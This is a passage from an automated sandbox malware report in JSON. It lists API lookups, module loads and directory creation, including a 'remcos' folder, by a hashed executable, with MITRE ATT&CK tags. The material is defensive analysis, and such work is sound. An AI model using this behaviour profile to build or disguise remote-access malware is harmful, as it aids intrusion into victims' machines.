(UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter GetExtendedUdpTable (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter SHGetValueA (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter DnsGetProxyInformation (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateSecurityManager (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateZoneManager (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter DhcpRequestParams (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoExW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter QueryActCtxW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleExW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CreateActCtxW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceGuidToLuid (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter GetIpForwardTable2 (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter GetIpNetEntry2 (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter FreeMibTable (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter StringFromIID (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter CoSetProxyBlanket (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter WSASocketA (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter WSASend (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter WSARecv (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetProcAddress\" with a parameter ObjectStublessClient10 (UID: 00000000-00003236)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e00844b056c@Iphlpapi.DLL\"\n \"0f001000dc4b056c@Iphlpapi.DLL\"\n \"0c000d00244c056c@Iphlpapi.DLL\"\n \"140015006c4c056c@Iphlpapi.DLL\"\n \"0c000d00e04c056c@Iphlpapi.DLL\"\n \"15001600c03e056c@ADVAPI32.dll\"\n \"0e000f00703f056c@ADVAPI32.dll\"\n \"0e000f00cc3f056c@ADVAPI32.dll\"\n \"11001200b447056c@ADVAPI32.dll\"\n \"110012004848056c@ADVAPI32.dll\"\n \"120013008c48056c@ADVAPI32.dll\"\n \"12001300e448056c@ADVAPI32.dll\"\n \"14001500f86e056c@ADVAPI32.dll\"\n \"14001500106f056c@ADVAPI32.dll\"\n \"14001500286f056c@ADVAPI32.dll\"\n \"17001800406f056c@ADVAPI32.dll\"\n \"0d000e00586f056c@ADVAPI32.dll\"\n \"11001200686f056c@ADVAPI32.dll\"\n \"110012007c6f056c@ADVAPI32.dll\"\n \"0d000e004466056c@WININET.dll\"\n \"0d000e00b466056c@WININET.dll\"\n \"10001100ec66056c@WININET.dll\"\n \"100011009067056c@WININET.dll\"\n \"10001100c06f056c@WININET.dll\"\n \"10001100d46f056c@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\remcos (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Local (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Microsoft\\Windows\\Cookies (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\History (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\CKDNCXYS (UID: 00000000-00003236)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71170000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"KERNEL32\" at base 75ad0000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"IPHLPAPI\" at base 73210000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"ADVAPI32.DLL\" at base 75260000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"SSPICLI.DLL\" at base 74d40000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"RPCRT4.DLL\" at base 76210000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"API-MS-WIN-CORE-SYSINFO-L1-2-1\" at base 0\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"KERNEL32.DLL\" at base 75ad0000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 75530000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74880000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 743e0000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 74870000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"DNSAPI.DLL\" at base 74740000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"IPHLPAPI.DLL\" at base 73210000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"RASADHLP.DLL\" at base 6dc10000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73180000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"CRYPTSP.DLL\" at base 748c0000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74650000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"CRYPTBASE.DLL\" at base 74db0000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"SECUR32.DLL\" at base 74be0000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"SHELL32.DLL\" at base 762c0000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"OLE32.DLL\" at base 760b0000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"PROFAPI.DLL\" at base 74ec0000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 71130000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75180000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"WS2_32.DLL\" at base 75530000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"WINHTTP.DLL\" at base 71090000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL\" at base 72900000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"URLMON.DLL\" at base 75650000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"OLEAUT32.DLL\" at base 75a30000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77120000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"CLBCATQ.DLL\" at base 77170000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NETPROFM.DLL\" at base 6e700000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73120000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"DHCPCSVC.DLL\" at base 730a0000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77120000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"COMCTL32.DLL\" at base 73db0000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 74e50000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NPMPROXY.DLL\" at base 6db40000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLEAUT32.DLL\" at base 75a30000\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WININET.DLL\" at base 75e00000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, 